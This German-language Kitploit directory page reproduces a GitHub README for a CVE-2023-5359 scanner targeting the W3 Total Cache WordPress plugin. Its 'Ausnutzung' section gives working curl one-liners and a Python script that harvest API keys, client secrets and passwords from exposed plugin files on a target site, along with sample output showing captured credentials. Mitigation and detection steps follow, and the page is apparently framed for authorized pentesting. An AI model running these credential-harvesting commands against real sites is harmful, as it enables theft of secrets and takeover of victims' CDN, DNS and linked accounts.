Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-5359 — CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Erkennt offengelegte Anmeldedaten in W3 Total Cache Plugin-Versionen ≤ 2.7.5. | Kitploit
Tools/GitHubGitHub/enzocipher/cve-2023-5359
SchwachstellenscannerPasswortangriffeExploitationInformationsbeschaffungWebsicherheitLernen & Bildung
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Erkennt offengelegte Anmeldedaten in W3 Total Cache Plugin-Versionen ≤ 2.7.5.

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-5359 - W3 Total Cache Schwachstelle durch Klartextspeicherung

Beschreibung

CVE-2023-5359 ist eine Schwachstelle durch Klartextspeicherung, die das WordPress-Plugin W3 Total Cache in Versionen ≤ 2.7.5 betrifft. Diese Schwachstelle ermöglicht es Remote-Angreifern, auf sensible Zugangsdaten zuzugreifen, die in unverschlüsselten, öffentlich zugänglichen PHP-Dateien gespeichert sind.

Schweregrad

  • CVSS-Score: 7.5 (Hoch)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Typ: Offenlegung sensibler Informationen

Technische Schwachstelle

Grundursache

W3 Total Cache speichert Konfigurationseinstellungen und API-Zugangsdaten in PHP-Dateien innerhalb des Verzeichnisses /wp-content/plugins/w3-total-cache/ ohne ausreichenden Schutz. Diese Dateien sind über HTTP erreichbar und legen Folgendes offen:

  • API-Schlüssel (CloudFlare, Google usw.)
  • Client-Geheimnisse
  • OAuth-Token
  • Zugangsdaten für externe Dienste

Betroffene Dateien

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Ausnutzung

Manuelle Methode

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Automatisiertes Skript

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Auswirkungen

Ein Angreifer kann Folgendes erlangen:

  1. CloudFlare-Zugangsdaten - Übernahme der Kontrolle über CDN und DNS
  2. API-Schlüssel für externe Dienste - Zugriff auf externe Konten
  3. OAuth-Token - Identität vortäuschen
  4. Cache-Konfigurationen - Manipulation ausgelieferter Inhalte

Gegenmaßnahmen

Sofortige Lösung

  1. Aktualisieren Sie auf W3 Total Cache ≥ 2.7.6
  2. Beschränken Sie den Zugriff auf PHP-Dateien im Plugins-Verzeichnis
  3. Widerrufen und neu generieren Sie alle offengelegten Zugangsdaten

Sichere Konfiguration

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Erkennung

Überprüfungsbefehl

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indikatoren für eine Kompromittierung

  • Ungewöhnliche Aktivitäten in externen APIs
  • Änderungen an CloudFlare-Konfigurationen
  • Datenverkehr von nicht autorisierten IPs zu verbundenen Diensten

Beispiel für einen Befund

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Referenzen

  • CVE-2023-5359
  • W3 Total Cache Änderungsprotokoll
  • WordPress-Sicherheitsteam

Rechtlicher Hinweis

Dieses Repository dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Die böswillige Nutzung dieser Informationen ist strengstens untersagt.


Fanden Sie diese Informationen nützlich? Geben Sie dem Repository einen Stern!

Zuletzt aktualisiert: November 2025

Tool herunterladen